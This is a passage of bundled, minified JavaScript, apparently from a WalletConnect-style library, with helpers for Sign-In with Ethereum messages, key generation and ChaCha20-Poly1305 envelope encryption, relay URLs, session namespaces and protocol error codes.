        if (n.length && !n.includes(r)) return;
        const o = e[r];
        t.push(...$a5d33cfc7f8e5437$export$d5ee58c6b13696e9(o.accounts));
    }), t;
}
function $a5d33cfc7f8e5437$export$d1109eeb751412cf(e, n = []) {
    const t = [];
    return Object.keys(e).forEach((r)=>{
        if (n.length && !n.includes(r)) return;
        const o = e[r];
        t.push(...$a5d33cfc7f8e5437$export$376384387cd15b27(r, o));
    }), t;
}
function $a5d33cfc7f8e5437$export$376384387cd15b27(e, n) {
    return e.includes(":") ? [
        e
    ] : n.chains || [];
}
const $a5d33cfc7f8e5437$export$a524ae552db7912 = (e)=>e?.split(":"), $a5d33cfc7f8e5437$export$85f23c05c80b194 = (e)=>{
    const n = e && $a5d33cfc7f8e5437$export$a524ae552db7912(e);
    if (n) return n[3];
}, $a5d33cfc7f8e5437$export$a8b149927aef7051 = (e)=>{
    const n = e && $a5d33cfc7f8e5437$export$a524ae552db7912(e);
    if (n) return n[2] + ":" + n[3];
}, $a5d33cfc7f8e5437$export$bf43cfbb4bd95de9 = (e)=>{
    const n = e && $a5d33cfc7f8e5437$export$a524ae552db7912(e);
    if (n) return n.pop();
}, $a5d33cfc7f8e5437$export$25868d1e8e76735f = (e, n)=>{
    const t = `${e.domain} wants you to sign in with your Ethereum account:`, r = $a5d33cfc7f8e5437$export$bf43cfbb4bd95de9(n), o = e.statement, s = `URI: ${e.aud}`, i = `Version: ${e.version}`, d = `Chain ID: ${$a5d33cfc7f8e5437$export$85f23c05c80b194(n)}`, l = `Nonce: ${e.nonce}`, c = `Issued At: ${e.iat}`, u = e.resources && e.resources.length > 0 ? `Resources:
${e.resources.map((a)=>`- ${a}`).join(`
`)}` : void 0;
    return [
        t,
        r,
        "",
        o,
        "",
        s,
        i,
        d,
        l,
        c,
        u
    ].filter((a)=>a != null).join(`
`);
}, $a5d33cfc7f8e5437$export$f7403969428298bd = "base10", $a5d33cfc7f8e5437$export$49eb910ab2518105 = "base16", $a5d33cfc7f8e5437$export$9bff723d552e6bcf = "base64pad", $a5d33cfc7f8e5437$export$9560dad2a83e4f04 = "utf8", $a5d33cfc7f8e5437$export$3425bd336a9673d8 = 0, $a5d33cfc7f8e5437$export$406e97c329f0f3d4 = 1, $a5d33cfc7f8e5437$var$wn = 0, $a5d33cfc7f8e5437$var$Oe = 1, $a5d33cfc7f8e5437$var$J = 12, $a5d33cfc7f8e5437$var$Q = 32;
function $a5d33cfc7f8e5437$export$a949d36eab55b41f() {
    const e = $569072827d3d60aa$exports.generateKeyPair();
    return {
        privateKey: (0, $74e9859baf4497ef$exports.toString)(e.secretKey, $a5d33cfc7f8e5437$export$49eb910ab2518105),
        publicKey: (0, $74e9859baf4497ef$exports.toString)(e.publicKey, $a5d33cfc7f8e5437$export$49eb910ab2518105)
    };
}
function $a5d33cfc7f8e5437$export$d15a28e4f1821243() {
    const e = (0, $73945d82524e104e$exports.randomBytes)($a5d33cfc7f8e5437$var$Q);
    return (0, $74e9859baf4497ef$exports.toString)(e, $a5d33cfc7f8e5437$export$49eb910ab2518105);
}
function $a5d33cfc7f8e5437$export$f8378f68e053f5c6(e, n) {
    const t = $569072827d3d60aa$exports.sharedKey((0, $74e9859baf4497ef$exports.fromString)(e, $a5d33cfc7f8e5437$export$49eb910ab2518105), (0, $74e9859baf4497ef$exports.fromString)(n, $a5d33cfc7f8e5437$export$49eb910ab2518105)), r = new (0, $eea881cb204cba82$exports.HKDF)((0, $66651f7624f8a7c0$exports.SHA256), t).expand($a5d33cfc7f8e5437$var$Q);
    return (0, $74e9859baf4497ef$exports.toString)(r, $a5d33cfc7f8e5437$export$49eb910ab2518105);
}
function $a5d33cfc7f8e5437$export$1e87d19d4aab5805(e) {
    const n = (0, $66651f7624f8a7c0$exports.hash)((0, $74e9859baf4497ef$exports.fromString)(e, $a5d33cfc7f8e5437$export$49eb910ab2518105));
    return (0, $74e9859baf4497ef$exports.toString)(n, $a5d33cfc7f8e5437$export$49eb910ab2518105);
}
function $a5d33cfc7f8e5437$export$d4c241cec96564c1(e) {
    const n = (0, $66651f7624f8a7c0$exports.hash)((0, $74e9859baf4497ef$exports.fromString)(e, $a5d33cfc7f8e5437$export$9560dad2a83e4f04));
    return (0, $74e9859baf4497ef$exports.toString)(n, $a5d33cfc7f8e5437$export$49eb910ab2518105);
}
function $a5d33cfc7f8e5437$export$e9d2f9ba70428fb6(e) {
    return (0, $74e9859baf4497ef$exports.fromString)(`${e}`, $a5d33cfc7f8e5437$export$f7403969428298bd);
}
function $a5d33cfc7f8e5437$export$7547a514ee29b9d4(e) {
    return Number((0, $74e9859baf4497ef$exports.toString)(e, $a5d33cfc7f8e5437$export$f7403969428298bd));
}
function $a5d33cfc7f8e5437$export$5b0f6292f11d1d18(e) {
    const n = $a5d33cfc7f8e5437$export$e9d2f9ba70428fb6(typeof e.type < "u" ? e.type : $a5d33cfc7f8e5437$export$3425bd336a9673d8);
    if ($a5d33cfc7f8e5437$export$7547a514ee29b9d4(n) === $a5d33cfc7f8e5437$export$406e97c329f0f3d4 && typeof e.senderPublicKey > "u") throw new Error("Missing sender public key for type 1 envelope");
    const t = typeof e.senderPublicKey < "u" ? (0, $74e9859baf4497ef$exports.fromString)(e.senderPublicKey, $a5d33cfc7f8e5437$export$49eb910ab2518105) : void 0, r = typeof e.iv < "u" ? (0, $74e9859baf4497ef$exports.fromString)(e.iv, $a5d33cfc7f8e5437$export$49eb910ab2518105) : (0, $73945d82524e104e$exports.randomBytes)($a5d33cfc7f8e5437$var$J), o = new (0, $1ca962bc0b1868f1$exports.ChaCha20Poly1305)((0, $74e9859baf4497ef$exports.fromString)(e.symKey, $a5d33cfc7f8e5437$export$49eb910ab2518105)).seal(r, (0, $74e9859baf4497ef$exports.fromString)(e.message, $a5d33cfc7f8e5437$export$9560dad2a83e4f04));
    return $a5d33cfc7f8e5437$export$dfdc1655ccc5b9cb({
        type: n,
        sealed: o,
        iv: r,
        senderPublicKey: t
    });
}
function $a5d33cfc7f8e5437$export$e85a0c9a1067c5d3(e) {
    const n = new (0, $1ca962bc0b1868f1$exports.ChaCha20Poly1305)((0, $74e9859baf4497ef$exports.fromString)(e.symKey, $a5d33cfc7f8e5437$export$49eb910ab2518105)), { sealed: t, iv: r } = $a5d33cfc7f8e5437$export$efcd34ab6248d3cd(e.encoded), o = n.open(r, t);
    if (o === null) throw new Error("Failed to decrypt");
    return (0, $74e9859baf4497ef$exports.toString)(o, $a5d33cfc7f8e5437$export$9560dad2a83e4f04);
}
function $a5d33cfc7f8e5437$export$dfdc1655ccc5b9cb(e) {
    if ($a5d33cfc7f8e5437$export$7547a514ee29b9d4(e.type) === $a5d33cfc7f8e5437$export$406e97c329f0f3d4) {
        if (typeof e.senderPublicKey > "u") throw new Error("Missing sender public key for type 1 envelope");
        return (0, $74e9859baf4497ef$exports.toString)((0, $74e9859baf4497ef$exports.concat)([
            e.type,
            e.senderPublicKey,
            e.iv,
            e.sealed
        ]), $a5d33cfc7f8e5437$export$9bff723d552e6bcf);
    }
    return (0, $74e9859baf4497ef$exports.toString)((0, $74e9859baf4497ef$exports.concat)([
        e.type,
        e.iv,
        e.sealed
    ]), $a5d33cfc7f8e5437$export$9bff723d552e6bcf);
}
function $a5d33cfc7f8e5437$export$efcd34ab6248d3cd(e) {
    const n = (0, $74e9859baf4497ef$exports.fromString)(e, $a5d33cfc7f8e5437$export$9bff723d552e6bcf), t = n.slice($a5d33cfc7f8e5437$var$wn, $a5d33cfc7f8e5437$var$Oe), r = $a5d33cfc7f8e5437$var$Oe;
    if ($a5d33cfc7f8e5437$export$7547a514ee29b9d4(t) === $a5d33cfc7f8e5437$export$406e97c329f0f3d4) {
        const d = r + $a5d33cfc7f8e5437$var$Q, l = d + $a5d33cfc7f8e5437$var$J, c = n.slice(r, d), u = n.slice(d, l), a = n.slice(l);
        return {
            type: t,
            sealed: a,
            iv: u,
            senderPublicKey: c
        };
    }
    const o = r + $a5d33cfc7f8e5437$var$J, s = n.slice(r, o), i = n.slice(o);
    return {
        type: t,
        sealed: i,
        iv: s
    };
}
function $a5d33cfc7f8e5437$export$177f3e316562333d(e, n) {
    const t = $a5d33cfc7f8e5437$export$efcd34ab6248d3cd(e);
    return $a5d33cfc7f8e5437$export$7949f60f2444aef2({
        type: $a5d33cfc7f8e5437$export$7547a514ee29b9d4(t.type),
        senderPublicKey: typeof t.senderPublicKey < "u" ? (0, $74e9859baf4497ef$exports.toString)(t.senderPublicKey, $a5d33cfc7f8e5437$export$49eb910ab2518105) : void 0,
        receiverPublicKey: n?.receiverPublicKey
    });
}
function $a5d33cfc7f8e5437$export$7949f60f2444aef2(e) {
    const n = e?.type || $a5d33cfc7f8e5437$export$3425bd336a9673d8;
    if (n === $a5d33cfc7f8e5437$export$406e97c329f0f3d4) {
        if (typeof e?.senderPublicKey > "u") throw new Error("missing sender public key");
        if (typeof e?.receiverPublicKey > "u") throw new Error("missing receiver public key");
    }
    return {
        type: n,
        senderPublicKey: e?.senderPublicKey,
        receiverPublicKey: e?.receiverPublicKey
    };
}
function $a5d33cfc7f8e5437$export$8c165704db2d5c15(e) {
    return e.type === $a5d33cfc7f8e5437$export$406e97c329f0f3d4 && typeof e.senderPublicKey == "string" && typeof e.receiverPublicKey == "string";
}
var $a5d33cfc7f8e5437$var$kn = Object.defineProperty, $a5d33cfc7f8e5437$var$Te = Object.getOwnPropertySymbols, $a5d33cfc7f8e5437$var$Mn = Object.prototype.hasOwnProperty, $a5d33cfc7f8e5437$var$Kn = Object.prototype.propertyIsEnumerable, $a5d33cfc7f8e5437$var$we = (e, n, t)=>n in e ? $a5d33cfc7f8e5437$var$kn(e, n, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : e[n] = t, $a5d33cfc7f8e5437$var$Re = (e, n)=>{
    for(var t in n || (n = {}))$a5d33cfc7f8e5437$var$Mn.call(n, t) && $a5d33cfc7f8e5437$var$we(e, t, n[t]);
    if ($a5d33cfc7f8e5437$var$Te) for (var t of $a5d33cfc7f8e5437$var$Te(n))$a5d33cfc7f8e5437$var$Kn.call(n, t) && $a5d33cfc7f8e5437$var$we(e, t, n[t]);
    return e;
};
const $a5d33cfc7f8e5437$export$f12873d77424d47b = "ReactNative", $a5d33cfc7f8e5437$export$86b1301a63b15dd9 = {
    reactNative: "react-native",
    node: "node",
    browser: "browser",
    unknown: "unknown"
}, $a5d33cfc7f8e5437$export$657dee6d5648750a = " ", $a5d33cfc7f8e5437$export$96c3628b3b9d2079 = ":", $a5d33cfc7f8e5437$export$98238152dfccf046 = "/", $a5d33cfc7f8e5437$export$7f882bb969de14a3 = 2, $a5d33cfc7f8e5437$export$77baccb4c6bd5852 = 1e3, $a5d33cfc7f8e5437$export$e08b61c98317d88c = "js";
function $a5d33cfc7f8e5437$export$8ee0fc9ee280b4ee() {
    return typeof $hPtJY < "u" && typeof $hPtJY.versions < "u" && typeof $hPtJY.versions.node < "u";
}
function $a5d33cfc7f8e5437$export$f7a1e23e542d38e3() {
    return !(0, $9cba2bd26fe13e26$exports.getDocument)() && !!(0, $9cba2bd26fe13e26$exports.getNavigator)() && navigator.product === $a5d33cfc7f8e5437$export$f12873d77424d47b;
}
function $a5d33cfc7f8e5437$export$4e09c449d6c407f7() {
    return !$a5d33cfc7f8e5437$export$8ee0fc9ee280b4ee() && !!(0, $9cba2bd26fe13e26$exports.getNavigator)();
}
function $a5d33cfc7f8e5437$export$57570b1603cf6adb() {
    return $a5d33cfc7f8e5437$export$f7a1e23e542d38e3() ? $a5d33cfc7f8e5437$export$86b1301a63b15dd9.reactNative : $a5d33cfc7f8e5437$export$8ee0fc9ee280b4ee() ? $a5d33cfc7f8e5437$export$86b1301a63b15dd9.node : $a5d33cfc7f8e5437$export$4e09c449d6c407f7() ? $a5d33cfc7f8e5437$export$86b1301a63b15dd9.browser : $a5d33cfc7f8e5437$export$86b1301a63b15dd9.unknown;
}
function $a5d33cfc7f8e5437$export$c4147c69f6845da(e, n) {
    let t = $3ecb7368762fc268$export$98e6a39c04603d36(e);
    return t = $a5d33cfc7f8e5437$var$Re($a5d33cfc7f8e5437$var$Re({}, t), n), e = $3ecb7368762fc268$export$fac44ee5b035f737(t), e;
}
function $a5d33cfc7f8e5437$export$ba31e015127122bb() {
    return (0, $6824eb17eeee766a$exports.getWindowMetadata)() || {
        name: "",
        description: "",
        url: "",
        icons: [
            ""
        ]
    };
}
function $a5d33cfc7f8e5437$export$6b05aa0115b6fc2d(e, n) {
    var t;
    const r = $a5d33cfc7f8e5437$export$57570b1603cf6adb(), o = {
        protocol: e,
        version: n,
        env: r
    };
    return r === "browser" && (o.host = ((t = (0, $9cba2bd26fe13e26$exports.getLocation)()) == null ? void 0 : t.host) || "unknown"), o;
}
function $a5d33cfc7f8e5437$export$20d4a3cb5829b8b6() {
    if ($a5d33cfc7f8e5437$export$57570b1603cf6adb() === $a5d33cfc7f8e5437$export$86b1301a63b15dd9.reactNative && typeof $parcel$global < "u" && typeof ($parcel$global == null ? void 0 : $parcel$global.Platform) < "u") {
        const { OS: t, Version: r } = $parcel$global.Platform;
        return [
            t,
            r
        ].join("-");
    }
    const e = (0, $48968958eb8b72e8$exports.detect)();
    if (e === null) return "unknown";
    const n = e.os ? e.os.replace(" ", "").toLowerCase() : "unknown";
    return e.type === "browser" ? [
        n,
        e.name,
        e.version
    ].join("-") : [
        n,
        e.version
    ].join("-");
}
function $a5d33cfc7f8e5437$export$4389b0987726d52d() {
    var e;
    const n = $a5d33cfc7f8e5437$export$57570b1603cf6adb();
    return n === $a5d33cfc7f8e5437$export$86b1301a63b15dd9.browser ? [
        n,
        ((e = (0, $9cba2bd26fe13e26$exports.getLocation)()) == null ? void 0 : e.host) || "unknown"
    ].join(":") : n;
}
function $a5d33cfc7f8e5437$export$b55a4c6e272b719f(e, n, t) {
    const r = $a5d33cfc7f8e5437$export$20d4a3cb5829b8b6(), o = $a5d33cfc7f8e5437$export$4389b0987726d52d();
    return [
        [
            e,
            n
        ].join("-"),
        [
            $a5d33cfc7f8e5437$export$e08b61c98317d88c,
            t
        ].join("-"),
        r,
        o
    ].join("/");
}
function $a5d33cfc7f8e5437$export$d875b3963ef774f5({ protocol: e, version: n, relayUrl: t, sdkVersion: r, auth: o, projectId: s, useOnCloseEvent: i }) {
    const d = t.split("?"), l = $a5d33cfc7f8e5437$export$b55a4c6e272b719f(e, n, r), c = {
        auth: o,
        ua: l,
        projectId: s,
        useOnCloseEvent: i || void 0
    }, u = $a5d33cfc7f8e5437$export$c4147c69f6845da(d[1] || "", c);
    return d[0] + "?" + u;
}
function $a5d33cfc7f8e5437$export$ed08891a8a54eb(e) {
    let n = (e.match(/^[^:]+(?=:\/\/)/gi) || [])[0];
    const t = typeof n < "u" ? e.split("://")[1] : e;
    return n = n === "wss" ? "https" : "http", [
        n,
        t
    ].join("://");
}
function $a5d33cfc7f8e5437$export$804de46662e4ac95(e, n, t) {
    if (!e[n] || typeof e[n] !== t) throw new Error(`Missing or invalid "${n}" param`);
}
function $a5d33cfc7f8e5437$export$1e21530e896c0b0b(e, n = $a5d33cfc7f8e5437$export$7f882bb969de14a3) {
    return $a5d33cfc7f8e5437$export$7f00885504704576(e.split($a5d33cfc7f8e5437$export$98238152dfccf046), n);
}
function $a5d33cfc7f8e5437$export$80bffd46c37a96f6(e) {
    return $a5d33cfc7f8e5437$export$1e21530e896c0b0b(e).join($a5d33cfc7f8e5437$export$657dee6d5648750a);
}
function $a5d33cfc7f8e5437$export$1468a49de573f7f9(e, n) {
    return e.filter((t)=>n.includes(t)).length === e.length;
}
function $a5d33cfc7f8e5437$export$7f00885504704576(e, n = $a5d33cfc7f8e5437$export$7f882bb969de14a3) {
    return e.slice(Math.max(e.length - n, 0));
}
function $a5d33cfc7f8e5437$export$c4b8dfeb6e237eb9(e) {
    return Object.fromEntries(e.entries());
}
function $a5d33cfc7f8e5437$export$ac31b37c726bc3ba(e) {
    return new Map(Object.entries(e));
}
function $a5d33cfc7f8e5437$export$592ef47eabb05614(e, n) {
    const t = {};
    return Object.keys(e).forEach((r)=>{
        t[r] = n(e[r]);
    }), t;
}
const $a5d33cfc7f8e5437$export$85c927578394b28b = (e)=>e;
function $a5d33cfc7f8e5437$export$e9f8fcacef3bca4b(e) {
    return e.trim().replace(/^\w/, (n)=>n.toUpperCase());
}
function $a5d33cfc7f8e5437$export$9a00dee1beb8f576(e) {
    return e.split($a5d33cfc7f8e5437$export$657dee6d5648750a).map((n)=>$a5d33cfc7f8e5437$export$e9f8fcacef3bca4b(n)).join($a5d33cfc7f8e5437$export$657dee6d5648750a);
}
function $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb(e = (0, $aG48A.FIVE_MINUTES), n) {
    const t = (0, $aG48A.toMiliseconds)(e || (0, $aG48A.FIVE_MINUTES));
    let r, o, s;
    return {
        resolve: (i)=>{
            s && r && (clearTimeout(s), r(i));
        },
        reject: (i)=>{
            s && o && (clearTimeout(s), o(i));
        },
        done: ()=>new Promise((i, d)=>{
                s = setTimeout(()=>{
                    d(new Error(n));
                }, t), r = i, o = d;
            })
    };
}
function $a5d33cfc7f8e5437$export$3da2293b007ed708(e, n, t) {
    return new Promise(async (r, o)=>{
        const s = setTimeout(()=>o(new Error(t)), n);
        try {
            const i = await e;
            r(i);
        } catch (i) {
            o(i);
        }
        clearTimeout(s);
    });
}
function $a5d33cfc7f8e5437$export$187ab6574b2ae23f(e, n) {
    if (typeof n == "string" && n.startsWith(`${e}:`)) return n;
    if (e.toLowerCase() === "topic") {
        if (typeof n != "string") throw new Error('Value must be "string" for expirer target type: topic');
        return `topic:${n}`;
    } else if (e.toLowerCase() === "id") {
        if (typeof n != "number") throw new Error('Value must be "number" for expirer target type: id');
        return `id:${n}`;
    }
    throw new Error(`Unknown expirer target type: ${e}`);
}
function $a5d33cfc7f8e5437$export$43ab92477f8713b9(e) {
    return $a5d33cfc7f8e5437$export$187ab6574b2ae23f("topic", e);
}
function $a5d33cfc7f8e5437$export$bd13103c2e5cc0c3(e) {
    return $a5d33cfc7f8e5437$export$187ab6574b2ae23f("id", e);
}
function $a5d33cfc7f8e5437$export$93adeb0f16e8e51d(e) {
    const [n, t] = e.split(":"), r = {
        id: void 0,
        topic: void 0
    };
    if (n === "topic" && typeof t == "string") r.topic = t;
    else if (n === "id" && Number.isInteger(Number(t))) r.id = Number(t);
    else throw new Error(`Invalid target, expected id:number or topic:string, got ${n}:${t}`);
    return r;
}
function $a5d33cfc7f8e5437$export$b136d03015bfc12(e, n) {
    return (0, $aG48A.fromMiliseconds)((n || Date.now()) + (0, $aG48A.toMiliseconds)(e));
}
function $a5d33cfc7f8e5437$export$57947cfd429801a2(e) {
    return Date.now() >= (0, $aG48A.toMiliseconds)(e);
}
function $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9(e, n) {
    return `${e}${n ? `:${n}` : ""}`;
}
function $a5d33cfc7f8e5437$export$9826fe7ad3921016(e = [], n = []) {
    return [
        ...new Set([
            ...e,
            ...n
        ])
    ];
}
async function $a5d33cfc7f8e5437$export$694a208c8abca99a({ id: e, topic: n, wcDeepLink: t }) {
    try {
        if (!t) return;
        const r = typeof t == "string" ? JSON.parse(t) : t;
        let o = r?.href;
        if (typeof o != "string") return;
        o.endsWith("/") && (o = o.slice(0, -1));
        const s = `${o}/wc?requestId=${e}&sessionTopic=${n}`, i = $a5d33cfc7f8e5437$export$57570b1603cf6adb();
        i === $a5d33cfc7f8e5437$export$86b1301a63b15dd9.browser ? s.startsWith("https://") ? window.open(s, "_blank", "noreferrer noopener") : window.open(s, "_self", "noreferrer noopener") : i === $a5d33cfc7f8e5437$export$86b1301a63b15dd9.reactNative && typeof ($parcel$global == null ? void 0 : $parcel$global.Linking) < "u" && await $parcel$global.Linking.openURL(s);
    } catch (r) {
        console.error(r);
    }
}
const $a5d33cfc7f8e5437$export$822d0bd1635d5360 = "irn";
function $a5d33cfc7f8e5437$export$cf77af25151525db(e) {
    return e?.relay || {
        protocol: $a5d33cfc7f8e5437$export$822d0bd1635d5360
    };
}
function $a5d33cfc7f8e5437$export$604e3deb95e1b734(e) {
    const n = (0, $a66838b5a814eb12$export$af490b3b9a6de00f)[e];
    if (typeof n > "u") throw new Error(`Relay Protocol not supported: ${e}`);
    return n;
}
var $a5d33cfc7f8e5437$var$dt = Object.defineProperty, $a5d33cfc7f8e5437$var$Fe = Object.getOwnPropertySymbols, $a5d33cfc7f8e5437$var$lt = Object.prototype.hasOwnProperty, $a5d33cfc7f8e5437$var$ft = Object.prototype.propertyIsEnumerable, $a5d33cfc7f8e5437$var$He = (e, n, t)=>n in e ? $a5d33cfc7f8e5437$var$dt(e, n, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : e[n] = t, $a5d33cfc7f8e5437$var$pt = (e, n)=>{
    for(var t in n || (n = {}))$a5d33cfc7f8e5437$var$lt.call(n, t) && $a5d33cfc7f8e5437$var$He(e, t, n[t]);
    if ($a5d33cfc7f8e5437$var$Fe) for (var t of $a5d33cfc7f8e5437$var$Fe(n))$a5d33cfc7f8e5437$var$ft.call(n, t) && $a5d33cfc7f8e5437$var$He(e, t, n[t]);
    return e;
};
function $a5d33cfc7f8e5437$export$3d24f408c2ac468a(e, n = "-") {
    const t = {}, r = "relay" + n;
    return Object.keys(e).forEach((o)=>{
        if (o.startsWith(r)) {
            const s = o.replace(r, ""), i = e[o];
            t[s] = i;
        }
    }), t;
}
function $a5d33cfc7f8e5437$export$59f58847421cfb28(e) {
    const n = e.indexOf(":"), t = e.indexOf("?") !== -1 ? e.indexOf("?") : void 0, r = e.substring(0, n), o = e.substring(n + 1, t).split("@"), s = typeof t < "u" ? e.substring(t) : "", i = $3ecb7368762fc268$export$98e6a39c04603d36(s);
    return {
        protocol: r,
        topic: $a5d33cfc7f8e5437$export$5ddc9ebef1d00f28(o[0]),
        version: parseInt(o[1], 10),
        symKey: i.symKey,
        relay: $a5d33cfc7f8e5437$export$3d24f408c2ac468a(i)
    };
}
function $a5d33cfc7f8e5437$export$5ddc9ebef1d00f28(e) {
    return e.startsWith("//") ? e.substring(2) : e;
}
function $a5d33cfc7f8e5437$export$65c55c7ccd19bb8f(e, n = "-") {
    const t = "relay", r = {};
    return Object.keys(e).forEach((o)=>{
        const s = t + n + o;
        e[o] && (r[s] = e[o]);
    }), r;
}
function $a5d33cfc7f8e5437$export$b2786ede34fb2350(e) {
    return `${e.protocol}:${e.topic}@${e.version}?` + $3ecb7368762fc268$export$fac44ee5b035f737($a5d33cfc7f8e5437$var$pt({
        symKey: e.symKey
    }, $a5d33cfc7f8e5437$export$65c55c7ccd19bb8f(e.relay)));
}
var $a5d33cfc7f8e5437$var$ht = Object.defineProperty, $a5d33cfc7f8e5437$var$Et = Object.defineProperties, $a5d33cfc7f8e5437$var$vt = Object.getOwnPropertyDescriptors, $a5d33cfc7f8e5437$var$ze = Object.getOwnPropertySymbols, $a5d33cfc7f8e5437$var$gt = Object.prototype.hasOwnProperty, $a5d33cfc7f8e5437$var$bt = Object.prototype.propertyIsEnumerable, $a5d33cfc7f8e5437$var$Be = (e, n, t)=>n in e ? $a5d33cfc7f8e5437$var$ht(e, n, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : e[n] = t, $a5d33cfc7f8e5437$var$Nt = (e, n)=>{
    for(var t in n || (n = {}))$a5d33cfc7f8e5437$var$gt.call(n, t) && $a5d33cfc7f8e5437$var$Be(e, t, n[t]);
    if ($a5d33cfc7f8e5437$var$ze) for (var t of $a5d33cfc7f8e5437$var$ze(n))$a5d33cfc7f8e5437$var$bt.call(n, t) && $a5d33cfc7f8e5437$var$Be(e, t, n[t]);
    return e;
}, $a5d33cfc7f8e5437$var$Ot = (e, n)=>$a5d33cfc7f8e5437$var$Et(e, $a5d33cfc7f8e5437$var$vt(n));
function $a5d33cfc7f8e5437$export$d46695d9c3664fe9(e) {
    const n = [];
    return e.forEach((t)=>{
        const [r, o] = t.split(":");
        n.push(`${r}:${o}`);
    }), n;
}
function $a5d33cfc7f8e5437$export$fb6db6038e742b14(e) {
    const n = [];
    return Object.values(e).forEach((t)=>{
        n.push(...$a5d33cfc7f8e5437$export$d46695d9c3664fe9(t.accounts));
    }), n;
}
function $a5d33cfc7f8e5437$export$7dcf4808e17b15ac(e, n) {
    const t = [];
    return Object.values(e).forEach((r)=>{
        $a5d33cfc7f8e5437$export$d46695d9c3664fe9(r.accounts).includes(n) && t.push(...r.methods);
    }), t;
}
function $a5d33cfc7f8e5437$export$94ee6d00e384a22(e, n) {
    const t = [];
    return Object.values(e).forEach((r)=>{
        $a5d33cfc7f8e5437$export$d46695d9c3664fe9(r.accounts).includes(n) && t.push(...r.events);
    }), t;
}
function $a5d33cfc7f8e5437$export$a8daa26a7c60ef90(e, n) {
    const t = $a5d33cfc7f8e5437$export$93f7b81dc815a714(e, n);
    if (t) throw new Error(t.message);
    const r = {};
    for (const [o, s] of Object.entries(e))r[o] = {
        methods: s.methods,
        events: s.events,
        chains: s.accounts.map((i)=>`${i.split(":")[0]}:${i.split(":")[1]}`)
    };
    return r;
}
function $a5d33cfc7f8e5437$export$c0b86bc9b7d9f338(e) {
    const { proposal: { requiredNamespaces: n, optionalNamespaces: t = {} }, supportedNamespaces: r } = e, o = $a5d33cfc7f8e5437$export$2994550cda701c96(n), s = $a5d33cfc7f8e5437$export$2994550cda701c96(t), i = {};
    Object.keys(r).forEach((c)=>{
        const u = r[c].chains, a = r[c].methods, g = r[c].events, P = r[c].accounts;
        u.forEach((m)=>{
            if (!P.some((f)=>f.includes(m))) throw new Error(`No accounts provided for chain ${m} in namespace ${c}`);
        }), i[c] = {
            chains: u,
            methods: a,
            events: g,
            accounts: P
        };
    });
    const d = $a5d33cfc7f8e5437$export$ba5b0a4b585cd1b4(n, i, "approve()");
    if (d) throw new Error(d.message);
    const l = {};
    return !Object.keys(n).length && !Object.keys(t).length ? i : (Object.keys(o).forEach((c)=>{
        const u = r[c].chains.filter((m)=>{
            var f, h;
            return (h = (f = o[c]) == null ? void 0 : f.chains) == null ? void 0 : h.includes(m);
        }), a = r[c].methods.filter((m)=>{
            var f, h;
            return (h = (f = o[c]) == null ? void 0 : f.methods) == null ? void 0 : h.includes(m);
        }), g = r[c].events.filter((m)=>{
            var f, h;
            return (h = (f = o[c]) == null ? void 0 : f.events) == null ? void 0 : h.includes(m);
        }), P = u.map((m)=>r[c].accounts.filter((f)=>f.includes(`${m}:`))).flat();
        l[c] = {
            chains: u,
            methods: a,
            events: g,
            accounts: P
        };
    }), Object.keys(s).forEach((c)=>{
        var u, a, g, P, m, f;
        if (!r[c]) return;
        const h = (a = (u = s[c]) == null ? void 0 : u.chains) == null ? void 0 : a.filter((T)=>r[c].chains.includes(T)), dn = r[c].methods.filter((T)=>{
            var w, _;
            return (_ = (w = s[c]) == null ? void 0 : w.methods) == null ? void 0 : _.includes(T);
        }), ln = r[c].events.filter((T)=>{
            var w, _;
            return (_ = (w = s[c]) == null ? void 0 : w.events) == null ? void 0 : _.includes(T);
        }), fn = h?.map((T)=>r[c].accounts.filter((w)=>w.includes(`${T}:`))).flat();
        l[c] = {
            chains: $a5d33cfc7f8e5437$export$9826fe7ad3921016((g = l[c]) == null ? void 0 : g.chains, h),
            methods: $a5d33cfc7f8e5437$export$9826fe7ad3921016((P = l[c]) == null ? void 0 : P.methods, dn),
            events: $a5d33cfc7f8e5437$export$9826fe7ad3921016((m = l[c]) == null ? void 0 : m.events, ln),
            accounts: $a5d33cfc7f8e5437$export$9826fe7ad3921016((f = l[c]) == null ? void 0 : f.accounts, fn)
        };
    }), l);
}
function $a5d33cfc7f8e5437$export$e03e993df4723bde(e) {
    return e.includes(":");
}
function $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8(e) {
    return $a5d33cfc7f8e5437$export$e03e993df4723bde(e) ? e.split(":")[0] : e;
}
function $a5d33cfc7f8e5437$export$2994550cda701c96(e) {
    var n, t, r;
    const o = {};
    if (!$a5d33cfc7f8e5437$export$16a0268bc22b47b0(e)) return o;
    for (const [s, i] of Object.entries(e)){
        const d = $a5d33cfc7f8e5437$export$e03e993df4723bde(s) ? [
            s
        ] : i.chains, l = i.methods || [], c = i.events || [], u = $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8(s);
        o[u] = $a5d33cfc7f8e5437$var$Ot($a5d33cfc7f8e5437$var$Nt({}, o[u]), {
            chains: $a5d33cfc7f8e5437$export$9826fe7ad3921016(d, (n = o[u]) == null ? void 0 : n.chains),
            methods: $a5d33cfc7f8e5437$export$9826fe7ad3921016(l, (t = o[u]) == null ? void 0 : t.methods),
            events: $a5d33cfc7f8e5437$export$9826fe7ad3921016(c, (r = o[u]) == null ? void 0 : r.events)
        });
    }
    return o;
}
const $a5d33cfc7f8e5437$var$Pt = {
    INVALID_METHOD: {
        message: "Invalid method.",
        code: 1001
    },
    INVALID_EVENT: {
        message: "Invalid event.",
        code: 1002
    },
    INVALID_UPDATE_REQUEST: {
        message: "Invalid update request.",
        code: 1003
    },
    INVALID_EXTEND_REQUEST: {
        message: "Invalid extend request.",
        code: 1004
    },
    INVALID_SESSION_SETTLE_REQUEST: {
        message: "Invalid session settle request.",
        code: 1005
    },
    UNAUTHORIZED_METHOD: {
        message: "Unauthorized method.",
        code: 3001
    },
    UNAUTHORIZED_EVENT: {
        message: "Unauthorized event.",
        code: 3002
    },
    UNAUTHORIZED_UPDATE_REQUEST: {
        message: "Unauthorized update request.",
        code: 3003
    },
    UNAUTHORIZED_EXTEND_REQUEST: {
        message: "Unauthorized extend request.",
        code: 3004
    },
    USER_REJECTED: {
        message: "User rejected.",
        code: 5e3
    },
    USER_REJECTED_CHAINS: {
